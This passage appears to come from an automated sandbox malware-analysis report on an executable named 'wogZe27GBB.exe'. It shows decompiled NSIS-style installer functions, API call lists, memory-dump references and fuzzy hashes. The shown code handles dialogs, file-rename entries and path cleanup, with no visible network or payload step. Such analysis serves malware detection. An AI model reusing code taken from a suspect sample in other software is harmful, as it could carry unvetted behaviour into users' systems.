                                                                                                        0x00403df7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e1d
                                                                                                        0x00403e23
                                                                                                        0x00403e25
                                                                                                        0x00403e2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e30
                                                                                                        0x00403e33
                                                                                                        0x00403e36
                                                                                                        0x00403e4d
                                                                                                        0x00403e59
                                                                                                        0x00403e72
                                                                                                        0x00403e78
                                                                                                        0x00403e7c
                                                                                                        0x00403e81
                                                                                                        0x00403e87
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e91
                                                                                                        0x00403e9c
                                                                                                        0x00000000
                                                                                                        0x00403e9c
                                                                                                        0x00403dc6
                                                                                                        0x00403dcc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dd2
                                                                                                        0x00403dd8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dde
                                                                                                        0x00403db2
                                                                                                        0x00403ea9
                                                                                                        0x00403eb5
                                                                                                        0x00403ebc
                                                                                                        0x00000000
                                                                                                        0x00403c0d
                                                                                                        0x00403c0d
                                                                                                        0x00403c10
                                                                                                        0x00403c43
                                                                                                        0x00403c43
                                                                                                        0x00403c45
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c45
                                                                                                        0x00403c12
                                                                                                        0x00403c16
                                                                                                        0x00403c1b
                                                                                                        0x00403c1d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c2d
                                                                                                        0x00403c35
                                                                                                        0x00000000
                                                                                                        0x00403c3b
                                                                                                        0x00403a69
                                                                                                        0x00403a69
                                                                                                        0x00403a6d
                                                                                                        0x00403a72
                                                                                                        0x00403a81
                                                                                                        0x00403a81
                                                                                                        0x00403a8a
                                                                                                        0x00403a93
                                                                                                        0x00403a9e
                                                                                                        0x00403a9e
                                                                                                        0x00403aaa
                                                                                                        0x00403ac6
                                                                                                        0x00403ac9
                                                                                                        0x00403adc
                                                                                                        0x00403ae2
                                                                                                        0x00403b85
                                                                                                        0x00000000
                                                                                                        0x00403b8e
                                                                                                        0x00403ae8
                                                                                                        0x00403af5
                                                                                                        0x00403af7
                                                                                                        0x00403af9
                                                                                                        0x00403b18
                                                                                                        0x00403b18
                                                                                                        0x00403b1b
                                                                                                        0x00403b20
                                                                                                        0x00403b23
                                                                                                        0x00403b33
                                                                                                        0x00403b34
                                                                                                        0x00403b36
                                                                                                        0x00403b6c
                                                                                                        0x00403b7f
                                                                                                        0x00000000
                                                                                                        0x00403b7f
                                                                                                        0x00403b38
                                                                                                        0x00403b3e
                                                                                                        0x00403b57
                                                                                                        0x00403b5c
                                                                                                        0x00403b5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b60
                                                                                                        0x00403b4c
                                                                                                        0x00403b4c
                                                                                                        0x00403b4e
                                                                                                        0x00403b4e
                                                                                                        0x00000000
                                                                                                        0x00403b4e
                                                                                                        0x00403b41
                                                                                                        0x00403b46
                                                                                                        0x00000000
                                                                                                        0x00403b46
                                                                                                        0x00403b25
                                                                                                        0x00403b2b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b2d
                                                                                                        0x00000000
                                                                                                        0x00403b2d
                                                                                                        0x00403b1d
                                                                                                        0x00000000
                                                                                                        0x00403b1d
                                                                                                        0x00403b03
                                                                                                        0x00403b0a
                                                                                                        0x00403b10
                                                                                                        0x00403b12
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b12
                                                                                                        0x00403ace
                                                                                                        0x00000000
                                                                                                        0x00403aac
                                                                                                        0x00403ab2
                                                                                                        0x00403abc
                                                                                                        0x00403ec2
                                                                                                        0x00403ec8
                                                                                                        0x00403ed5
                                                                                                        0x00403edb
                                                                                                        0x00403edb
                                                                                                        0x00403ee5
                                                                                                        0x00000000
                                                                                                        0x00403ee5
                                                                                                        0x00403aaa

                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                        • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                        • 73BC9840.USER32 ref: 00403AB2
                                                                                                        • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                        • GetDlgItem.USER32 ref: 00403AEF
                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                        • GetDlgItem.USER32 ref: 00403BB8
                                                                                                        • GetDlgItem.USER32 ref: 00403BC2
                                                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                        • GetDlgItem.USER32 ref: 00403CD3
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                        • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                        • lstrlen.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                        • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$C9840ClassEnabledSystemTextlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 792189959-0
                                                                                                        • Opcode ID: 0ca44dad19ebef12785e3fca4310d205a7ec76f049bba6dd02c4170e1792f308
                                                                                                        • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                        • Opcode Fuzzy Hash: 0ca44dad19ebef12785e3fca4310d205a7ec76f049bba6dd02c4170e1792f308
                                                                                                        • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				long _t88;
				int _t97;
				struct HWND__* _t98;
				signed int _t99;
				intOrPtr _t108;
				int _t109;
				signed int* _t111;
				signed int _t112;
				char* _t113;
				void* _t114;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t109 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t109);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t109 = _a16;
						if( *((intOrPtr*)(_t109 + 8)) == 0x70b &&  *((intOrPtr*)(_t109 + 0xc)) == 0x201) {
							_t99 =  *((intOrPtr*)(_t109 + 0x1c));
							_t108 =  *((intOrPtr*)(_t109 + 0x18));
							_v12 = _t99;
							_v16 = _t108;
							_v8 = 0x422e40;
							if(_t99 - _t108 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t109 = _a16;
							}
						}
						if( *((intOrPtr*)(_t109 + 8)) != 0x700 ||  *((intOrPtr*)(_t109 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t109 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t109 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t111 =  *0x41fc70 + 0x14;
						if(( *_t111 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t111 =  *_t111 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t97 = _a16;
				_t112 =  *(_t97 + 0x30);
				if(_t112 < 0) {
					_t112 =  *( *0x42367c - 4 + _t112 * 4);
				}
				_push( *((intOrPtr*)(_t97 + 0x34)));
				_t113 = _t112 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t113;
				_v12 = _v12 & 0x00000000;
				_t114 = _t113 + 1;
				_v16 = _t114;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t97 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001);
				_t98 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t98);
				SendMessageA(_t98, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t98, 0x443, 0, _t86);
				_t88 = SendMessageA(_t98, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				_push(_t114);
				L00405B7C();
				SendMessageA(_t98, 0x435, 0, _t88);
				SendMessageA(_t98, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}


















                                                                                                        0x00404070
                                                                                                        0x00404196
                                                                                                        0x004041f2
                                                                                                        0x004041f6
                                                                                                        0x004042cd
                                                                                                        0x004042cf
                                                                                                        0x004042cf
                                                                                                        0x004042d5
                                                                                                        0x004042d5
                                                                                                        0x004042d8
                                                                                                        0x00000000
                                                                                                        0x004042df
                                                                                                        0x00404204
                                                                                                        0x00404206
                                                                                                        0x00404210
                                                                                                        0x0040421b
                                                                                                        0x0040421e
                                                                                                        0x00404221
                                                                                                        0x0040422c
                                                                                                        0x0040422f
                                                                                                        0x00404236
                                                                                                        0x00404244
                                                                                                        0x0040425c
                                                                                                        0x00404264
                                                                                                        0x0040426f
                                                                                                        0x0040427f
                                                                                                        0x00404281
                                                                                                        0x00404281
                                                                                                        0x00404236
                                                                                                        0x0040428b
                                                                                                        0x00000000
                                                                                                        0x00404296
                                                                                                        0x0040429a
                                                                                                        0x004042ab
                                                                                                        0x004042ab
                                                                                                        0x004042b1
                                                                                                        0x004042bf
                                                                                                        0x004042bf
                                                                                                        0x00000000
                                                                                                        0x004042c3
                                                                                                        0x0040428b
                                                                                                        0x004041a1
                                                                                                        0x00000000
                                                                                                        0x004041b5
                                                                                                        0x004041bb
                                                                                                        0x004041c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004041e6
                                                                                                        0x004041e8
                                                                                                        0x004041ed
                                                                                                        0x00000000
                                                                                                        0x004041ed
                                                                                                        0x004041a1
                                                                                                        0x00404076
                                                                                                        0x00404079
                                                                                                        0x0040407e
                                                                                                        0x0040408f
                                                                                                        0x0040408f
                                                                                                        0x00404096
                                                                                                        0x00404099
                                                                                                        0x0040409b
                                                                                                        0x004040a0
                                                                                                        0x004040a9
                                                                                                        0x004040af
                                                                                                        0x004040bb
                                                                                                        0x004040be
                                                                                                        0x004040c7
                                                                                                        0x004040cc
                                                                                                        0x004040cf
                                                                                                        0x004040d4
                                                                                                        0x004040eb
                                                                                                        0x004040f2
                                                                                                        0x00404105
                                                                                                        0x00404108
                                                                                                        0x0040411d
                                                                                                        0x00404124
                                                                                                        0x00404129
                                                                                                        0x0040412e
                                                                                                        0x0040412e
                                                                                                        0x0040413d
                                                                                                        0x0040414c
                                                                                                        0x0040414e
                                                                                                        0x00404155
                                                                                                        0x00404156
                                                                                                        0x00404164
                                                                                                        0x00404173
                                                                                                        0x00404175
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32 ref: 004040EB
                                                                                                        • GetDlgItem.USER32 ref: 004040FF
                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                        • GetSysColor.USER32(?), ref: 0040412E
                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                        • lstrlen.KERNEL32(?), ref: 00404156
                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                        • GetDlgItem.USER32 ref: 004041D6
                                                                                                        • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                        • GetDlgItem.USER32 ref: 00404204
                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                        • LoadCursorA.USER32 ref: 00404253
                                                                                                        • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                        • LoadCursorA.USER32 ref: 0040427C
                                                                                                        • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                        • String ID: @.B$N$open
                                                                                                        • API String ID: 3615053054-3815657624
                                                                                                        • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                        • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                        • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                        • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							_push("[Rename]\r\n");
							if(E004057B2(_t25, _t51) != 0) {
								_push(0x409350);
								_t28 = E004057B2(_t26 + 0xa, _t26 + 0xa);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                        0x004058ba
                                                                                                        0x004058c1
                                                                                                        0x004058c5
                                                                                                        0x004058ce
                                                                                                        0x004058d2
                                                                                                        0x00405a11
                                                                                                        0x00405a11
                                                                                                        0x00000000
                                                                                                        0x00405a11
                                                                                                        0x004058d2
                                                                                                        0x004058de
                                                                                                        0x004058f4
                                                                                                        0x0040591c
                                                                                                        0x00405927
                                                                                                        0x0040592b
                                                                                                        0x0040594b
                                                                                                        0x00405952
                                                                                                        0x0040595c
                                                                                                        0x00405969
                                                                                                        0x0040596e
                                                                                                        0x00405973
                                                                                                        0x00405977
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405986
                                                                                                        0x00405988
                                                                                                        0x00405995
                                                                                                        0x00405999
                                                                                                        0x00405a0a
                                                                                                        0x00405a0b
                                                                                                        0x00000000
                                                                                                        0x004059b5
                                                                                                        0x004059b5
                                                                                                        0x004059c2
                                                                                                        0x00405a21
                                                                                                        0x00405a27
                                                                                                        0x00405a2e
                                                                                                        0x004059d5
                                                                                                        0x004059d5
                                                                                                        0x004059d7
                                                                                                        0x004059e0
                                                                                                        0x004059eb
                                                                                                        0x004059fd
                                                                                                        0x00405a04
                                                                                                        0x00000000
                                                                                                        0x00405a04
                                                                                                        0x00405a30
                                                                                                        0x00405a31
                                                                                                        0x00405a36
                                                                                                        0x00405a38
                                                                                                        0x00405a45
                                                                                                        0x00405a45
                                                                                                        0x00405a49
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a3a
                                                                                                        0x00405a3a
                                                                                                        0x00405a3d
                                                                                                        0x00405a40
                                                                                                        0x00405a41
                                                                                                        0x00000000
                                                                                                        0x00405a3a
                                                                                                        0x004059cd
                                                                                                        0x004059d2
                                                                                                        0x00000000
                                                                                                        0x004059d2
                                                                                                        0x00405999
                                                                                                        0x004058f6
                                                                                                        0x00405901
                                                                                                        0x0040590a
                                                                                                        0x0040590e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040590e
                                                                                                        0x00405a1b

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                        • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                        • wsprintfA.USER32 ref: 00405945
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                        • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                        • String ID: %s=%s$0&B$[Rename]
                                                                                                        • API String ID: 3772915668-951905037
                                                                                                        • Opcode ID: 73d0c5d55c6a66a5fc5f40039b5a9282ef929e2af51c157191695387f36ba956
                                                                                                        • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                        • Opcode Fuzzy Hash: 73d0c5d55c6a66a5fc5f40039b5a9282ef929e2af51c157191695387f36ba956
                                                                                                        • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                        0x00405dca
                                                                                                        0x00405dd2
                                                                                                        0x00405de6
                                                                                                        0x00405de6
                                                                                                        0x00405dec
                                                                                                        0x00405df9
                                                                                                        0x00405df9
                                                                                                        0x00405dfa
                                                                                                        0x00405dfc
                                                                                                        0x00405e00
                                                                                                        0x00405e02
                                                                                                        0x00405e0b
                                                                                                        0x00405e0d
                                                                                                        0x00405e27
                                                                                                        0x00405e2f
                                                                                                        0x00405e2f
                                                                                                        0x00405e34
                                                                                                        0x00405e36
                                                                                                        0x00405e38
                                                                                                        0x00405e3c
                                                                                                        0x00405e3d
                                                                                                        0x00405e40
                                                                                                        0x00405e48
                                                                                                        0x00405e4a
                                                                                                        0x00405e4e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405e54
                                                                                                        0x00405e59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405e59
                                                                                                        0x00405e5e

                                                                                                        APIs
                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                        • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                        • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\wogZe27GBB.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-3469374200
                                                                                                        • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                        • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                        • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                        • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

